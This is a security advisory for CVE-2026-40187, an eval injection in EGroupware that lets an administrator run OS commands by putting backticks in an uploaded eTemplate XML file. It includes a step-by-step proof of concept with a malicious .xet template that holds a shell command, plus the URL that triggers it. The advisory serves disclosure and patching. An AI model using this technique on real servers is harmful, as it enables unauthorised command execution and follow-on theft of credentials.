PT-2026-56213 · Packagist · Egroupware/Egroupware

Publicado

2026-07-07

·

Atualizado

2026-07-07

·

CVE-2026-40187

CVSS v4.0

8.6

Alta

VetorAV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Summary

An authenticated administrator can achieve OS-level Remote Code Execution (RCE) by uploading a malicious eTemplate XML file (.xet) to the VFS /etemplates mount.
The Widget::expand name() method passes template widget attribute values directly into a PHP eval() call with only double-quote escaping applied - backtick characters are not escaped.
In PHP, backticks inside a double-quoted eval() string execute shell commands. This allows an admin-level user to escalate from web application access to arbitrary OS command execution on the server.

Details

The vulnerability is located in api/src/Etemplate/Widget.php, Widget::expand name(): (lines 703–728)
The method is designed to expand PHP variables (e.g., $row, $col,$cont[id]) in widget attribute values for auto-repeat grids. The eval() is triggered whenever $name contains a $ character (line 706). The only sanitization applied before the eval is:
php
str replace('"', '"', $name)
This escapes double quotes only. Backtick characters are not escaped. In PHP, backticks inside a double-quoted string in eval() are treated as shell execution operators — equivalent to shell exec(). A widget id of $rowid`` produces:
eval('$name = "$row`id`";'); // executes shell command: id
expand name() is called from:
  • form name()
  • expand widget()
  • set attrs()
  • Template::run()
The /etemplates VFS path is created exclusively for admin users — it is chgrp'd to Admins and chmod'd to 075 (Admins group has full rwx): class.filemanager admin.inc.php:95-106
Custom templates in /etemplates take precedence over built-in filesystem templates, meaning a malicious template can silently override any existing application template.
Mitigating factor: The official Docker deployment sets disable functions = exec,passthru,shell exec,system,proc open,popen in php.ini, which also blocks PHP backtick execution (backticks internally call shell exec). Non-Docker or non-hardened deployments without this php.ini setting are fully vulnerable. Dockerfile:47
The current master branch in api/setup/setup.inc.php, confirming the vulnerability is present in the latest code as of today. setup.inc.php:14-17

Proof of Concept (PoC)

Prerequisites

  • Admin account
  • Non-Docker deployment, or Docker deployment where disable functions has been removed/modified in php.ini

Step 1 — Mount /etemplates:

Log in as admin, navigate to Admin → Filemanager → VFS Mounts, and click "Install custom templates". This executes the code in filemanager admin.inc.php that mounts /etemplates with Admins-group write access.

Step 2 — Upload malicious template:

Create a file named index.xet with the following content:
xml
<?xml version="1.0" encoding="UTF-8"?>
<overlay>
 <template id="admin.index">
  <grid>
   <columns><column/></columns>
   <rows>
    <row>
     <textbox id="$row`touch /tmp/pwned egw 2>/dev/null`"/>
    </row>
   </rows>
  </grid>
 </template>
</overlay>
Upload this file to /etemplates/admin/templates/default/index.xet via the VFS filemanager.

Step 3 — Trigger execution:

Navigate to the EGroupware admin panel:
https://<target>/egroupware/index.php?menuaction=admin.admin ui.index 
When the template is loaded and beforeSendToClient() runs, form name() calls expand name() with $name = '$rowtouch /tmp/pwned egw 2>/dev/null'and$row = 0. The eval becomes:
eval('$name = "$row`touch /tmp/pwned egw 2>/dev/null`";');
PHP executes the backtick expression as a shell command.

Step 4 — Verify:

Check that /tmp/pwned egw was created on the server. For a more impactful demonstration, replace touch /tmp/pwned egw with id > /tmp/pwned egw to capture the web server's OS user identity.

Impact

Authenticated Remote Code Execution (RCE) via eval() with unsanitized shell metacharacters.
Who is impacted: Any EGroupware installation where:
  1. An admin account is compromised or a malicious admin exists, AND
  2. The server is not running with disable functions blocking shell exec (i.e., non-Docker or misconfigured deployments)

Severity

The vulnerability allows escalation from EGroupware admin-level web access to arbitrary OS command execution as the web server user (typically www-data). From there, an attacker can read configuration files (including database credentials), pivot to other services, or establish persistence. This is not exploitable by regular (non-admin) users. The official Docker deployment is not affected due to disable functions, but bare-metal, VM, or custom container deployments without this hardening are fully vulnerable.

Correção

Eval Injection

OS Command Injection

Encontrou algum problema na descrição? Tem algo a acrescentar? Fique à vontade para nos escrever 👾

Enumeração de Fraquezas

Identificadores relacionados

CVE-2026-40187
GHSA-8737-2X9G-XJJ7

Produtos afetados

Egroupware/Egroupware